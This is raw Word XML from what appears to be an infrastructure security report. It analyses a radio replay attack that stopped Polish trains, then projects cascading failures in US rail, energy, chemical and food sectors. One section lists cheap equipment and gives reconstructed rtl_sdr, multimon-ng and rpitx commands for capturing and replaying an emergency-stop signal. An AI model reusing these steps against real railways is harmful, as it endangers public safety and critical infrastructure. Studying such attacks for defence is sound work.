      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1x9i9ne0re60" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Simplicity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Poland attackers demonstrated alarming simplicity </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref46">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[46]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Equipment Required</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Total cost: ~$50):</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14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RTL-SDR dongle: $30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Antenna: $10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Laptop: Any consumer grade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Software: Free open-source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19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Skill Level</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic radio knowledge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">YouTube tutorials sufficient</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No programming required</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2-3 hours preparation</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0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Steps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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2">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Actual commands used (reconstructed)</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4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Step 1: Find emergency frequency</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6">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rtl_sdr -f 151.48M -s 2.4M capture.raw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Step 2: Decode radio traffic</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A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">multimon-ng -t raw -a POCSAG capture.raw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Step 3: Replay emergency stop</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E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rpitx -m FM -f 151480 stop_command.wav</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1n3rrbm9x8xp" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lessons from Attack Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p4epsbvphykn" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical Security Gaps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis reveals fundamental flaws </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref47">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[47]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No Authentication</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Any transmitted signal accepted as legitimate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No Encryption</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Commands sent in clear analog FM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No Validation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Geographic or temporal verification absent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Legacy Design</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 1970s-era protocols still in use</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_48g1f0viipos" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Failed Defenses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Polish railways had no effective countermeasures </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref48">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[48]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No spectrum monitoring deployed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No anomaly detection systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No backup communication channels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual verification procedures ignored</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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2mv8vmr8r2g9" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Sector Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2zw07u67r9lf" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Infrastructure Cascade Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Poland attack methodology applied to US infrastructure would create catastrophic cascading failures </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref49">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[49]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_szmayvvmsdu9" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Impact (0-4 hours)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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sector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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Facilities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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Population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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Essential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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Rail Transport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760 railroads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167M dependent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All freight halted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hyperlink w:anchor="ref50">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[50]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Energy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400 coal plants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94M affected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30% generation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hyperlink w:anchor="ref51">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[51]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Chemical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13,500 facilities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40M at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Chlorine shortage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hyperlink w:anchor="ref52">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[52]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Agriculture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3,200 terminals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330M impacted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Food distribution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hyperlink w:anchor="ref53">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[53]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xwf2r1635t5q" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cascading Failures (4-24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Power Grid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Rolling blackouts as coal deliveries cease </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref54">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[54]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Water Systems</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Treatment chemical depletion begins </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref55">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[55]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
